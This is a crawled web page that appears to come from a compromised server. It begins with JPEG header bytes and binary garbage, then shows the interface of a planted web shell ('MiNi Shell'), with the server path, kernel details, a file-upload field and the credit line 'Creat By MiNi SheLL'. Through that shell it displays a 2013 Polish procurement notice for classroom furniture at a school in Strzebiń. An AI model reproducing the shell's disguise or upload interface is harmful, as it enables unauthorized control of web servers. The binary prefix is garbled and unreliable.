JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/294076-N-2013.html

<p class="kh_header"><b>Koszęcin: Wyposażenie sal lekcyjnych w nowo wybudowanej części Gimnazjum nr 2                w Strzebiniu</b><br>
<b>Numer ogłoszenia: 294076 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Koszęcin , ul. Powstańców 10, 42-286 Koszęcin, woj. śląskie, tel. 0-34 3576100 w. 120, faks 0-34 3576108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koszecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie sal lekcyjnych w nowo wybudowanej części Gimnazjum nr 2                w Strzebiniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Tablice zielone-tryptyki o wym. 340 cm x 100 cm.
	6
Tablice białe - o wym. 200 cm x 100 cm.
	2
Tablica biała magnetyczna suchościeralna rozkładana typu tryptyk. Wymiar po rozłożeniu: szerokość 400 cm, wysokość 100 cm;  po złożeniu szerokość 200 cm.	1
Tablica stojąca- biała obrotowa o wym.140 x 100 cm.	1
Biurko nauczycielskie z szafką i szufladą 120 x 60 x 75cm.
Płyta laminowana grubości 18 mm, obrzeża PCV 2 mm, kolor BUK	8
Stolik komputerowy 100 x 70 x 75cm.
Płyta laminowana grubości 18 mm, obrzeża PCV  2 mm, kolor BUK	1
Biurko komputerowe z zamykaną szafką boczną 110 x 70 x 75cm Płyta laminowana grubości 18 mm, obrzeża PCV  2 mm, kolor BUK	1
Krzesła nauczycielskie - konferencyjne,  tapicerowane, stelaż chrom o siedzisku o wym. 40 x 38 cm, oparcie tapicerowane o wym. 39 x 13 cm z plastikowymi wkładkami w nogach, bordo lub brąz. 	35
Stół konferencyjny składający się z 4 elementów - 2 prostokątnych             o wym. 160 x 80 x72 cm, 2 półokrągłych wym. 160 x 80 x 72cm. Płyta laminowana o  grubości 18 mm, obrzeża PCV  2 mm, kolor BUK.	1
Stoliki uczniowskie 2-os. Stelaż O 25mm x 25mm w kolorze zielonym, płyta laminowana gr. 18 mm ,wym. 130 x 50 cm, obrzeże PCV 2 mm,  z wymiennymi plastykowymi wkładkami w nogach, kolor BUK.	70
Stoliki uczniowskie 1-os. Stelaż O 25mm x 25mm w kolorze zielonym, płyta laminowana gr. 18 mm, wym. 130 x 50cm, obrzeże PCV  2 mm,  z wymiennymi plastikowymi wkładkami w nogach, kolor BUK.	46
Stolik kwadratowy, stelaż skręcany o O 32mm, płyta laminowana gr. 18 mm, wym. 80 x 80cm, obrzeże PCV 2 mm, kolor BUK.	2
Krzesła uczniowskie z oparciem półokrągłym, stelaż O25mm, kolor zielony (nogi zakończone plastikowymi wkładkami wymiennymi), roz. 6, w oparciu wycięcie.	184
Tablice korkowe w drewnianej ramce o wym.180 x100 cm.	22
Szafa, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm, wym. 196 x 80 x 40cm, dolne półki z drzwiczkami, górne półki z drzwiczkami oszklonymi, kolor BUK	10
Szafa składająca się z 10 zamykanych schowków, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm, wym.196 x 80 x 40cm, kolor BUK	2
Szafa składająca się z 8-śmiu zamykanych schowków  oraz z jednej zamykanej na klucz półki na 20 dzienników, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm, wym. 196 x 80 x 40cm, kolor BUK	1
Szafka zamykana dzielona na 1 półkę zamkniętą na dole i  1 półkę otwartą na górze, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm,          wym. 124 x 80 x 40cm, kolor BUK.	3
Szafa odzieżowa,wym. 196 x 80 x 60cm, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm, kolor BUK.	1
Szafa biurowa, zamykana na klucz, z wewnętrznymi półkami, wym. 196 x 80 x 60cm, z dwoma parami drzwi, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm, kolor BUK	9
Szafa aktowa zamykana na klucz z wewnętrznymi półkami, jedna para drzwi, wym.196 x 80 x 40cm, płyta laminowana gr. 18 mm, obrzeża PCV 2 mm, kolor BUK.	8
Zegar ścienny o O 30cm z aluminiową ramą.	9
Zegar ścienny o O 40cm z aluminiową ramą.	1
Szafa metalowa na akta, z zamkiem patentowym i klamką o wym. 200 x 100 x 43,5cm.	1
Szafa metalowa na akta, z zamkiem patentowym z klamką o wym. 180 x 80 x 40cm.	1
Parawan medyczny, zmywalny, dwuskrzydłowy o wym. 164 x 140 cm, ekran o kolorze zielonym, stelaż o kolorze białym.	1
Żaluzje pionowe do klas wym. szer. 240 x wys. 230 cm
Kolor jasny beż.	24
Żaluzje pionowe do gabinetów wym. szer. 180 x wys.150 cm
Kolor jasny beż.	3
Stolik zabiegowy do instrumentów medycznych oraz aparatury medycznej. Znajduje zastosowanie w jednostkach służby zdrowia.
Stolik zabiegowy wyposażony w dwie szklane półki                              i w jedną miskę z tworzywa Szkielet stolika jest metalowy, lakierowany proszkowo.Wym: 43 x 84 x 72 cm.	1 
Szafa lekarska laboratoryjna ,drzwi szafy przeszklone, półki wykonane ze szkła, przestawne co 25 mm. Dolna półka zabudowana - drzwi wykonane z blachy. Uchwyt drzwiowy z zamkiem zabezpieczającym ryglującym drzwi w dwóch punktach, wym. 180 x 80 x 40 cm	1
Ławeczki na korytarz, o długości 200 cm, drewniane deski na metalowym stelażu, bez oparcia, roz.6, nogi u dołu rozszerzone	12
Wieszak na mapę, metalowy
	1
Kosz na mapy, metalowy, na kółkach
	1
Godło RP w ramce drewnianej, wym.33 x 44 cm.
	8
Kosze na śmieci plastikowe z pokrywą ruchomą, poj. 25 l. 
	12
Kosze na śmieci plastikowe z pokrywą ruchomą, poj. 35 l.-45 l.	7
Apteczka metalowa na ścianę o wym.30 x 25 x 15 cm.
	3
Trwała mata zewnętrzna  wejściowa - wycieraczka gumowa przeznaczona do intensywnego użytkowania. Guma naturalna grubość 23 mm, wym.100 x 150 cm.	3
Wieszaki ubraniowe stojące drewniane z podstawą marmurową, z uchwytem na parasol. 5 górnych podwójnych wieszaków na ubrania i 4 wieszaki krótkie
	5
Ławeczki do szatni z wieszakami ,wykonane z profili stalowych, malowanych lakierem proszkowym,siedzisko wykonane z drewnianych listew malowanych lakierem bezbarwnym.Ławko-wieszak posiada półkę na obuwie wykonaną z profili stalowych. Wieszaki wyposażone są w haki w rozstawie 15 cm. Długość ławki 200 cm, wys. 156 cm, głębokość 36 cm.
	12
Wycieraczka o  wym. 100 x 200 cm, profesjonalna, wielokierunkowa, do miejsc o dużym zanieczyszczeniu brudem. Ostra struktura wycieraczki wykonana ze spienionej gumy, wzmocnione brzegi, spód antypoślizgowy	4
Garderoba, wym. 90 x 200 cm,garderoba  składa się z:
 przestronnego lustra i wieszaków na stelażu z płyty laminowanej, bez dolnej szafki. Płyta laminowana o  grubości 18 mm, obrzeża PCV  2 mm, kolor BUK.	1
Tabliczka informacyjna nadrzwiowa przeznaczona do użytku zewnętrznego lub wewnętrznego. Składa się z dwóch aluminiowych profili o szerokości 25 mm, wykończone eleganckimi, grafitowymi zaślepkami. Rama dostępna w kolorze srebrnym anodowanym. Tabliczka posiada wbudowany system zatrzaskowy OWZ, zapewniający szybką i łatwą wymianę informacji. Tylną ścianę wykonano ze specjalnego, trwałego materiału, odpornego na pęknięcia. Istnieje możliwość zawieszenia tabliczki zarówno w pionie, jak i w poziomie - w zależności od potrzeb. Tabliczki informacyjne na drzwi wym:  dł 12cm x szer7cm
	17
Tabliczka numerowe na drzwi grawerowana w laminacie złotym lub srebrnym.(metalizowane tworzywo sztuczne, grubość 1,5mm, kolor grawerki czarny)
Rozmiar 5 x 5 cm. Numeracja od 1 do 40 
	40
Tabliczka numerowe na drzwi grawerowana w laminacie złotym lub srebrnym.(metalizowane tworzywo sztuczne, grubość 1,5mm, kolor grawerki czarny)
Rozmiar 5 x 5 cm. Oznakowanie toalet
	9
Szafki na klucze z blachy stalowej wyposażona w zestaw numerowanych haczyków oraz zamek z 2 kluczami pojemność do 50 kluczy z  breloczkami 
	2
Szafki na klucze z blachy stalowej wyposażona w zestaw numerowanych haczyków oraz zamek z 2 kluczami pojemność do 30 kluczy z  wyposażeniem dodatkowym - breloczki
	1
Pojemniki metalowe na papier toaletowy, wym: 260 mm x 255 mm x 125 mm, zamykane na klucz.
	10
Pojemniki metalowe na ręczniki papierowe ZZ. Pojemność: od 250    do 400 sztuk, Wielkość listka: 250 x 230 mm.Materiał obudowy: stal nierdzewna	10
Metalowe dozowniki na mydło w płynie, mocowane śrubami.	10
Lustro proste o wym. 60 x 120 cm	1
Lustra proste o wym. 60 x 60 cm	6
Magnetofony typu boom box (CD, CD-R, CD-RW, MP3-CD, WMA-CD, wejście usb), dobre odtwarzanie dźwięku w salach lekcyjnych 	
4.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający dokona oceny spełnienia tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy prawo Zamówień Publicznych. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia - Wykonawca zrealizował w okresie ostatnich 3 lat
przed upływem terminu składania ofert:

a) co najmniej 1 dostawę pomocy dydaktycznych o wartości nie niższej niż 40 000,00 zł   brutto lub,
b) dwie dostawy pomocy dydaktycznych o łącznej wartości nie niższej niż 40 000,00 zł    brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Specyfikację techniczną oferowanego sprzętu.Certyfikaty Zgodności z normami PN-ISO 5970:1994, PN-F-06009:2001, PN-90/F-06010/05 dla poszczególnych elementów wyposażenia sal lekcyjnych. 4.	Zamawiający dopuszcza użycie innych równoważnych materiałów, technologii i urządzeń niż wskazane w Opisie przedmiotu zamówienia  - Załącznik nr 8 do SIWZ, lecz muszą spełniać wszystkie normy oraz być o parametrach nie gorszych od wskazanych                                          przez Zamawiającego. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały  lub urządzenia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty - Załącznik Nr 1 do SIWZ.

2. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio                z załączonych dokumentów. Załączone do oferty pełnomocnictwo winno być w formie oryginału
lub kopii poświadczonej notarialnie.

3. Informacje dotyczące podwykonawców - Załącznik Nr 6 do SIWZ. Jeżeli Wykonawca nie
przewiduje zatrudnienia podwykonawców wpisuje (nie dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności. Strony dopuszczają zmianę postanowień umowy zgodnie z wymogami art. 144 ustawy Prawo zamówień publicznych w przypadku:

a) zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
b) wystąpienia siły wyższej powodującej, że wykonanie przedmiot umowy w terminie nie jest możliwe - zmianie ulegnie termin realizacji przedmiotu umowy o okres wystąpienia siły wyższej,
c) gdy między dniem złożenia oferty, a dniem dostarczenia przedmiotu zamówienia zaistnieje sytuacja, że zaoferowany towar nie będzie dostępny na rynku na skutek wycofania z produkcji pod warunkiem, że nowy towar będzie posiadał parametry techniczne nie gorsze niż towar wcześniej oferowany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://koszecin.bipgmina.pl/wiadomosci/3/lista/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Koszęcin ul. Powstańców Śl. 10, 42-286 Koszęcin, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 10:00, miejsce: Urząd Gminy Koszęcin ul. Powstańców Śl. 10, 42-286 Koszęcin, pokój Nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com